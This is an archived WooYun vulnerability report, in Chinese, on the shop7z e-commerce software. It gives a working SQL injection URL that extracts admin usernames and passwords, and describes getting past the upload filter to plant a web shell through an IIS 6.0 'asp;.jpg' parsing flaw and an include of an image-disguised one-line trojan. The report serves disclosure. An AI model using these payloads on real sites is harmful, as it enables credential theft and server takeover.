shop7z sql注入后台上传可突破getshell | wooyun-2013-041416| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-041416

漏洞标题：shop7z sql注入后台上传可突破getshell

漏洞作者： roker

提交时间：2013-10-30 14:48

修复时间：2013-12-14 14:49

公开时间：2013-12-14 14:49

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-10-30：积极联系厂商并且等待厂商认领中，细节不对外公开
2013-12-14：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

sql注入

详细说明：

dataname.asp
path_back=LCase(request.servervariables("QUERY_STRING"))
if instr(path_back,"insert")<>0 or instr(path_back,"update")<>0 or instr(path_back,"delete")<>0 
or instr(path_back,"(")<>0 or instr(path_back,"'")<>0 or instr(path_back," or ")<>0 or instr(path_back,"replace")<>0 
or instr(path_back,"eval")<>0 then
response.write "<BR><BR><center>你的网址不合法</a>"

奇葩了。。不知他这么写和没过滤有什么区别。。
于是看了下数据文件表的结构。。
exp ： show.asp?pkid=4820%20and%201%20=%202%20union%20select%201,2,3,4,5,6,7,s_user,9,10,11,12,s_pwd,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%20from%20admin
有两个上传的地方
一个是 ewebeditor
一个是他自己写的
ewebeditor只能上传jpg等正常文件，其他可以利用的都删了
看他自己写的上传。。虽然重命名了，可是后面却包含了原文件名
可以上传 2013xx.asp;.jpg格式的
利用iis6.0解析漏洞，本来以为这样就结束了。。
可是

set MyFile = server.CreateObject("Scripting.FileSystemObject")
set MyText = MyFile.OpenTextFile(Server.mappath(filename)) '读取文本文件
sTextAll = lcase(MyText.ReadAll())
MyText.close
set MyFile = nothing
sStr=".getfolder|.createfolder|.deletefolder|.createdirectory|.deletedirectory|eval|雷驰新闻发布|script|"
sStr=sStr&".saveas|wscript.shell|script.encode|server.|.createobject|execute|activexobject|language="
snum = split(sStr,"|") 
for i=0 to ubound(snum)
     if instr(sTextAll,snum(i)) then
       set filedel = server.CreateObject("Scripting.FileSystemObject")
       filedel.deletefile Server.mappath(filename)
       set filedel = nothing
       Response.Write("<script>alert('上传失败0!');window.close();</script>")
       Response.End()
     end if
next

对上传的文件内容进行了过滤，
可是木有过滤 include~~
于是在 ewebeditor处上传图片格式一句话， savaupload处上传 2013xxxxx.asp;.jpg格式的包含图片一句话木马的路径，就可以得到shell啦~~

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-041416

漏洞标题：shop7z sql注入后台上传可突破getshell

相关厂商：石家庄欣德网络科技有有限公司

漏洞作者： roker

提交时间：2013-10-30 14:48

修复时间：2013-12-14 14:49

公开时间：2013-12-14 14:49

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 roker@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-041416

漏洞标题：shop7z sql注入 后台上传可突破getshell

相关厂商：石家庄欣德网络科技有有限公司

漏洞作者： roker

提交时间：2013-10-30 14:48

修复时间：2013-12-14 14:49

公开时间：2013-12-14 14:49

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-041416"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 roker@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

漏洞标题：shop7z sql注入后台上传可突破getshell

Tags标签：无

4人收藏收藏
分享漏洞：